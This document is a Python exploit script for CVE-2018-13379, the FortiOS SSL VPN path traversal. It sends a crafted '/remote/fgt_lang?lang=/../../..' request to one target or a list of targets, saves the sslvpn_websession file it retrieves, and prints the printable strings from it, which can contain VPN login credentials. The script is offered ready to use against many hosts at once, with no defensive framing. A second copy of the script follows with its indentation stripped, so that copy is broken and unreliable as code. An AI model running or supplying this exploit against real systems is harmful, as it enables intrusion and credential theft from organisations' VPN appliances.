code-machina/CVE-2018-13379.py

## CVE-2018-13379.py
import requests, binascii, optparse
from urlparse import urlparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
import multiprocessing

def checkIP(ip):
	try:
		url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
		headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
		r=requests.get(url, headers=headers, verify=False, stream=True, timeout=2)
		img=r.raw.read()
		if "var fgt_lang =" in str(img):
			with open("sslvpn_websession_"+ip+".dat", 'w') as f:
				f.write(img)
			parseFile(ip)
			print "\n"
			return True
		else:
			return False
	except requests.exceptions.ConnectionError:
		return False

def read_bytes(filename, chunksize=8192):
  try:
    with open(filename, "rb") as f:
      while True:
        chunk = f.read(chunksize)
        if chunk:
          for b in chunk:
            yield b
        else:
          break
  except IOError:
    pass

def is_character_printable(s):
  return all((ord(c) < 127) and (ord(c) >= 32) for c in s)

def validate_byte_as_printable(byte):
  if is_character_printable(byte):
    return byte
  else:
    return '.'

def parseFile(ip):
	print "[Checking: "+ip+"]"
	url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
	print "[*} Web session at: "+url
	filename="sslvpn_websession_"+ip+".dat"
	memory_address = 0
	ascii_string = ""
	for byte in read_bytes(filename):
	  ascii_string = ascii_string + validate_byte_as_printable(byte)
	  if memory_address%61 == 60:
	    if ascii_string!=".............................................................":
	    	print ascii_string
	    ascii_string = ""
	  memory_address = memory_address + 1

parser = optparse.OptionParser()
parser.add_option('-f', action="store", dest="filename")
parser.add_option('-i', action="store", dest="ip", help="e.g. 127.0.0.1:10443")
parser.add_option('-n', action="store", dest="numOfThreads")
options, remainder = parser.parse_args()
numOfThreads=10
ipList=[]
if options.ip:
	ipList.append(options.ip)
if options.filename:
	with open(options.filename) as f:
		ipList = f.read().splitlines()
if options.numOfThreads:
	numOfThreads=int(options.numOfThreads)
ipList = filter(None, ipList)

p = multiprocessing.Pool(processes=numOfThreads)
p.map(checkIP,ipList)
p.close()
	import requests, binascii, optparse
	from urlparse import urlparse
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
	requests.packages.urllib3.disable_warnings()
	import multiprocessing

	def checkIP(ip):
	try:
	url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
	headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
	r=requests.get(url, headers=headers, verify=False, stream=True, timeout=2)
	img=r.raw.read()
	if "var fgt_lang =" in str(img):
	with open("sslvpn_websession_"+ip+".dat", 'w') as f:
	f.write(img)
	parseFile(ip)
	print "\n"
	return True
	else:
	return False
	except requests.exceptions.ConnectionError:
	return False

	def read_bytes(filename, chunksize=8192):
	try:
	with open(filename, "rb") as f:
	while True:
	chunk = f.read(chunksize)
	if chunk:
	for b in chunk:
	yield b
	else:
	break
	except IOError:
	pass

	def is_character_printable(s):
	return all((ord(c) < 127) and (ord(c) >= 32) for c in s)

	def validate_byte_as_printable(byte):
	if is_character_printable(byte):
	return byte
	else:
	return '.'

	def parseFile(ip):
	print "[Checking: "+ip+"]"
	url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
	print "[*} Web session at: "+url
	filename="sslvpn_websession_"+ip+".dat"
	memory_address = 0
	ascii_string = ""
	for byte in read_bytes(filename):
	ascii_string = ascii_string + validate_byte_as_printable(byte)
	if memory_address%61 == 60:
	if ascii_string!=".............................................................":
	print ascii_string
	ascii_string = ""
	memory_address = memory_address + 1

	parser = optparse.OptionParser()
	parser.add_option('-f', action="store", dest="filename")
	parser.add_option('-i', action="store", dest="ip", help="e.g. 127.0.0.1:10443")
	parser.add_option('-n', action="store", dest="numOfThreads")
	options, remainder = parser.parse_args()
	numOfThreads=10
	ipList=[]
	if options.ip:
	ipList.append(options.ip)
	if options.filename:
	with open(options.filename) as f:
	ipList = f.read().splitlines()
	if options.numOfThreads:
	numOfThreads=int(options.numOfThreads)
	ipList = filter(None, ipList)

	p = multiprocessing.Pool(processes=numOfThreads)
	p.map(checkIP,ipList)
	p.close()